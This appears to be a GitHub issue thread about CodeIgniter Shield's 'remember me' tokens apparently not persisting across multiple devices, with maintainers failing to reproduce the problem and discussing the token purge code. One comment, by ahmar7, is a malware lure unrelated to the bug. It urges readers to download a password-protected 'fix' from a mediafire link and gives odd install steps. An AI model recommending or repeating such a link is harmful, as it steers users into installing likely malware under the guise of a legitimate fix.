### ISSUE TITLE
Bug: Remember doesn't work for multiple devices

### ISSUE THREAD

**Issue by Tabify-Daan** [codeigniter4/shield#1189]
### PHP Version

-

### CodeIgniter4 Version

4.4.3

### Shield Version

1.0.3

### Which operating systems have you tested for this bug?

Windows, Linux

### Which server did you use?

apache

### Database

MySql

### Did you customize Shield?

No

### What happened?

If someone logged in. A remember me is inserted in the datase. But if i log in from a different device on the same account (wich is common). It purges all other tokens. So it stops remembering.

Why not just keep all tokens exept expired?
MySql can handle a million rows ez.

Suggested fix:
In Auth.php add a variable with 
```
public array $sessionConfig = [
        'field'              => 'user',
        'allowRemembering'   => true,
        'rememberCookieName' => 'remember',
        'rememberMultipleDevices' => true, //this one
        'rememberLength'     => 30 * DAY,
    ];
    
```
This way you can choose.

### Steps to Reproduce

Log in with remember me,
Log in on different device with remember me.

### Expected Output

First device is no longer remembered

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by kenjis** [comment]
Cannot reproduce.
I see two records in `auth_remember_tokens`.

**Comment by datamweb** [comment]
Cannot reproduce.

```console
php spark db:table auth_remember_tokens

CodeIgniter v4.5.4 Command Line Tool - Server Time: 2024-08-27 12:03:41 UTC+00:00

+-----------+------------+----------+----------+----------+------+
| hostname  | database   | username | DBDriver | DBPrefix | port |
+-----------+------------+----------+----------+----------+------+
| localhost | ci4ci4ci4c | root     | MySQLi   |          | 3306 |
+-----------+------------+----------+----------+----------+------+

Data of Table "auth_remember_tokens":

+----+--------------------+--------------------+---------+--------------------+--------------------+--------------------+
| id | selector           | hashedValidator    | user_id | expires            | created_at         | updated_at
|
+----+--------------------+--------------------+---------+--------------------+--------------------+--------------------+
| 1  | c4246a6624b5a5e... | 10fef10bd0a8a71... | 8       | 2024-09-26 12:0... | 2024-08-27 12:0... | 2024-08-27 12:0... |
| 2  | b25542d209e36a2... | cb2491c937b2a56... | 8       | 2024-09-26 12:0... | 2024-08-27 12:0... | 2024-08-27 12:0... |
+----+--------------------+--------------------+---------+--------------------+--------------------+--------------------+
```

**Comment by Tabify-Daan** [comment]
No, I see now.. I looked through the vendor code. And this is part of session.php:

```php
 private function issueRememberMeToken(): void
    {
        if ($this->shouldRemember && setting('Auth.sessionConfig')['allowRemembering']) {
            $this->rememberUser($this->user);

            // Reset so it doesn't mess up future calls.
            $this->shouldRemember = false;
        } elseif ($this->getRememberMeToken() !== null) {
            $this->removeRememberCookie();

            // @TODO delete the token record.
        }

        // We'll give a 20% chance to need to do a purge since we
        // don't need to purge THAT often, it's just a maintenance issue.
        // to keep the table from getting out of control.
        if (random_int(1, 100) <= 20) {
            $this->rememberModel->purgeOldRememberTokens();
        }
    }
```
In the model:
```php
public function purgeRememberTokens(User $user): void
    {
        $return = $this->where(['user_id' => $user->id])->delete();

        $this->checkQueryReturn($return);
    }
```

So its a 20% chance it deletes all record with that user id (so even of other devices)..
I think this should not be default behavior.

**Comment by kenjis** [comment]
@Tabify-Daan No. It is not `purgeRememberTokens()` but `purgeOldRememberTokens()`.
The `purgeOldRememberTokens()` removes only expired tokens.
https://github.com/codeigniter4/shield/blob/4170cdfbaefa71b4688e43ff625d29891226bca5/src/Models/RememberModel.php#L101-L107

**Comment by Tabify-Daan** [comment]
Then i really dont understand why its so fucked

**Comment by kenjis** [comment]
We really don't know why your remember token is gone.
